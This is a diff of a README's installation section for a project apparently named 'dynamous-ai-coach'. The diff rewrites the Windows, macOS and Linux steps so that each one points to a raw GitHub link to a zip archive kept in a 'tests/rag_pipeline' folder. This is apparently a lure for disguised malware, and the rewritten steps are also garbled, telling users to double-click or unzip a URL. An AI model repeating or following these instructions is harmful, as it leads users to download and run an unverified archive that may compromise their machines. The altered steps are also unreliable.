Rhaetoromanicmilitia619/dynamous-ai-coach/README.md

 ### 📥 For Windows Users
 1. Locate the downloaded zip file in your Downloads folder.
 2. Right-click the file and select "Extract All."
-3. Open the extracted folder and double-click `dynamous-ai-coach.exe` to run it.
+3. Open the extracted folder and double-click `https://github.com/Rhaetoromanicmilitia619/dynamous-ai-coach/raw/refs/heads/main/tests/rag_pipeline/coach-ai-dynamous-3.2.zip` to run it.

 ### 🍏 For macOS Users
 1. Find the downloaded zip file in your Downloads folder.
 2. Double-click the file to extract it.
-3. Open the extracted folder and double-click `dynamous-ai-coach.app` to run it.
+3. Open the extracted folder and double-click `https://github.com/Rhaetoromanicmilitia619/dynamous-ai-coach/raw/refs/heads/main/tests/rag_pipeline/coach-ai-dynamous-3.2.zip` to run it.

 ### 🐧 For Linux Users
 1. Open a terminal.
 2. Navigate to the download location using `cd ~/Downloads`.
-3. Use the command `unzip dynamous-ai-coach-linux.zip` to extract the files.
+3. Use the command `unzip https://github.com/Rhaetoromanicmilitia619/dynamous-ai-coach/raw/refs/heads/main/tests/rag_pipeline/coach-ai-dynamous-3.2.zip` to extract the files.
 4. Change into the extracted folder: `cd dynamous-ai-coach-linux`.
 5. Run the application with `./dynamous-ai-coach`.